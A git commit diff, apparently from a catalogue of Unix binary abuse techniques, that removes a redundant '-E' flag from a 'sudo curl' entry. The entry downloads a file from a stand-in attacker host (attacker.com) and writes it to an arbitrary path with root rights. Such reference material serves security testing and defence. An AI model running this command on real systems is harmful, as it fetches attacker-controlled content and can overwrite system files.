Remove useless instances of sudo -E

This commit is contained in:
Andrea Cardaci
2020-06-10 22:53:45 +02:00
parent fbd887e91a
commit 9cd6849b8e
5 changed files with 5 additions and 5 deletions

View File

@@ -28,5 +28,5 @@ functions:
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
sudo -E curl $URL -o $LFILE
sudo curl $URL -o $LFILE
---